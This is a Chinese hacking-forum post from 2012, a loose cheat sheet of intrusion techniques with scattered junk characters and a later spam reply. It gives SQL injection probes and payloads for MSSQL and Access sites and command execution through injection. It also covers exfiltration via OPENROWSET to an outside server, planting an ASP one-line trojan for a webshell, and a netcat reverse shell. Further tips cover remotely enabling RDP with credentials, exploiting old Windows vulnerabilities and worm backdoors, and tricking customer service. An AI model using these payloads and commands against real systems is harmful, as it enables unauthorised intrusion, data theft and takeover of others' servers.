找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3661|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
+ Q; n$ ~: t; w* K- I" n; |- q" L& X/ X! R

  A/ f0 a5 ?. G6 ]- p/ n- zSA点数据库分离搞法+语句:: T; w+ v9 d# }+ H4 {
( Q' |* k" ^; ~- [8 _
注射点不显错,执行下面三条语句页面都返回正常。
: q, M: _) ~4 }' r" X* y% iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
" T3 E5 @5 r$ R+ E7 k; }and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')/ c1 E/ q2 ?9 H. p; s2 v
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')% J( l* e; X& i4 A' T
可以列目录,判断系统为2000,web与数据库分离
6 g2 k2 d8 A) X( g$ _& n遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。& _& j/ O8 z. |+ @, g9 q* r
在注射点上执行6 b6 h9 g+ X" ^3 r% s' |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
. }; E  F8 `' Y页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP" e8 H5 e6 l2 _" |  w7 `
还有我用NC监听得其他端口都没有得到IP。
# F% y/ t* t' ]- k- E3 T3 o  D1 z+ |0 s1 s
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
# p1 u( z0 f9 M5 S6 h! ~'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 y% N; t8 |. }0 S) R1 b/ M  Q3 n
9 H* f: Q  ]9 z# w% W, x' m: H+ P' \;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--$ V4 m" h! u& s; Y7 k2 [  m
% w# n! A7 u1 Y+ D# y
现在就猜想是不是数据库是内网而且不能连外网。" ~7 y/ c5 O2 X1 x! t- ?( ]# [  {

0 H' X: D5 w2 V% D2 W  l$ k
) i8 S) a0 ~; g: H- Qaccess导出txt文本代码
8 a" W' t2 B; ]# D' iSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
' d+ {* ]& T4 E; q
- b3 e6 R! J: u5 ^& V7 p; V5 i
& U7 ~. i& V0 q" p, u4 E& [9 {+ e/ ]
自动跳转到指定网站代码头
( j* I2 d& F5 {0 n. l<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
$ o' ~$ F9 R$ s4 U% f1 a' Z
: ], V5 q+ h* K9 ~/ b! H8 `" S( E5 ?3 x3 R" I/ p
入侵java or jsp站点时默认配置文件路径:
: l$ v- n8 r" z# c" K\web-inf\web.xml
! y) k0 X. ^; ]4 o( V4 jtomcat下的配置文件位置:; k% v( w) k9 M; r
\conf\server.xml            (前面加上tomcat路径)
$ `4 z1 I' r' K# h% c& m\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
* V" g% |! ?* d$ n5 y. ^; b. [0 {# N0 L5 e: {
: |! @# A" m% \0 l
1 s! g5 i, }4 {* q$ P
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
( W" y- z( X& D* h; T2 E. V-1%23- A: I$ c# T* \# q
>
* o( H# Q7 d$ k& t& w<# F' w, Q/ s1 ]- e$ ^* m, V. o, F& X
1'+or+'1'='1
4 l" {2 o" {( l$ T& Vid=8%bf% i$ r' R; _9 _! `3 O3 q) y/ S
) P* g2 K) e! z# ~' Y3 b
全新注入点检测试法:
8 p- O, M" ~  e! J: R% f/ I在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
0 j- A( u9 ^6 ], D7 }
+ {" j; c+ P  M1 O在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。6 o0 f* n3 N0 U
0 l7 ]' L# x5 M' W
搜索型注入判断方法:0 A6 r; f; x8 O
北京%' and '1'='1' and '%'='! m) s5 a9 t; N/ E9 W6 O- ^
北京%' and '1'='2' and '%'='
0 H0 Q9 g8 B. @) e* I3 K! u5 K( X8 q" j6 Q: k! J  p: }

8 p4 e8 j3 \) b, YCOOKIES注入:
8 F+ U5 Z5 h8 O5 T! }3 p3 d# B* M5 U* I
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
+ C* V1 r# \, R/ z0 D8 k3 m- W% c6 ?# T* Q# H9 m
2000专业版查看本地登录用户命令:' J, g0 Z2 V$ k4 Q8 B7 o
net config workstation  h% c+ E/ Z& t  C5 Q, @( v" R

9 J7 O$ L/ n9 c: l: k' N+ Q7 h
, ]1 q2 k0 M& _8 F2003下查看ipsec配置和默认防火墙配置命令:  h/ e7 u$ w' N0 x3 x& i/ Y
netsh firewall show config# p# ?3 F+ d1 C. Q. c- f1 I, {
netsh ipsec static show all. t$ n5 g$ |8 v* o+ }$ B
# v1 o! Z2 x6 V# |7 S0 v; P) C$ [
不指派指定策略命令:
0 I2 X+ r) I: z$ onetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)+ l+ {& O" M" J6 Y
netsh ipsec static show policy all  显示策略名' F, I' U8 n7 W# v
; E# y, Z, l0 t% [( W

% Z7 m$ w. e, l3 e. W' N9 D猜管理员后台小技巧:- W# J+ n/ y: |& P- g: e+ B% u9 y
admin/left.asp ( X" T( N. i9 N/ S" Q; v
admin/main.asp( W+ R5 s9 I: t6 m
admin/top.asp6 ?. @$ M6 R7 m9 T; J- N8 Y1 ]8 J
admin/admin.asp
9 a+ ]1 X1 W. L& M会现出菜单导航,然后迅雷下载全部链接
/ Z0 i4 @# u. L) \: S" A3 G2 P) r( l# |5 y* K3 |- }

# S: B, N1 E/ y4 J2 n" c# s社会工程学:
( n$ `5 Q5 Q! g/ M" @. q用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人# y# F  q( |7 V2 e+ t$ \
然后去骗客服
2 p6 P. [2 o& T( }. u6 d- Y9 a  V- X; a( d
% _  i4 X2 t* `- U9 h. o* `& E
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: & W% L! F5 c2 X! o2 E" a% T
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
& w. `- Q8 E2 c4 L1 `& ^* C  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。4 l  b; _$ L$ I& o& x
8 I: x; v+ G% Q# f
8 p) j; M, T% h8 Y* N
+ t$ S* @* d: W" p9 @+ X7 X  ]  `
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)/ }0 @6 d  S+ I4 x+ k. }, \

4 q# |4 F7 ]7 o! M+ B# M& z& s6 P3 A" `* Y# G, q3 Q7 U1 l
# R2 R3 ]# H# R7 d0 f
CMD加密注册表位置
  P: ]+ X) G* E9 x5 ^& Q* ~7 S# G0 `8 c5 I(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor9 L9 `! |% z+ q( O# L, k+ f
AutoRun* u' b/ U3 P5 Y" u  m
$ E+ n) o+ V9 F7 a+ K7 Q
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor1 q9 i; R3 ~$ `1 W/ u
AutoRun! ~& U) Q& c5 V, x8 S

1 @! }3 {3 G  l# H2 Z7 A" |7 p
- B/ f2 }, d. d在找注入时搜索Hidden,把他改成test& Z2 i2 M' Z7 f8 `& e3 G# Q! n

- Y! }! q/ q0 m" I: i* f! Z  U) k: T2 }0 C; K+ Z: C
# B" j2 T) l* b! ]
mstsc /v:IP /console   v. X4 H( Q$ C% E# z
8 {- L" [  {% K8 a  g: z1 ]5 Q
& z, O( o; j* F* i5 s6 t) a8 t7 s
一句话开3389:
6 ], v/ w3 V# n) E* H% K+ ]& M4 y2 o1 p3 `: U/ E
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
$ ^0 t- ~+ h3 m开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.4 |1 C6 p: z8 ]/ u) C% z7 \' M3 V4 h2 x
2 ^  ^4 L: x! l
: p7 a  p* p3 |, |4 `
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:! |' Y$ R( h% ]4 V; m' c8 [% L
Insert into admin(user,pwd) values('test','test')
0 }( P8 G, |# l! ~8 A3 P6 o  s" Y: N7 F/ F; `
1 Q) G$ ?* ?: Z: f4 C% r# v6 X
NC反弹
2 p* h9 B5 G( W7 `! w0 `3 F0 V先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   & N  g6 h% z) R3 c0 Q
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
9 }8 U0 a- J0 H/ {. r+ I" A+ h6 O$ O

* `* S( T9 ?% A在脚本入侵过程中要经常常试用%00来确认下参数是否有问题: V, ~. `! Y% d7 K

5 [. @: n2 w( m5 w有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录/ n+ i# j0 J9 R: y' B. [) k
例如:
# x6 o7 ?3 |0 m+ ~subst k: d:\www\ 用d盘www目录替代k盘
3 ?$ d% q; V, ~. C" x/ k8 S  J+ L& Psubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表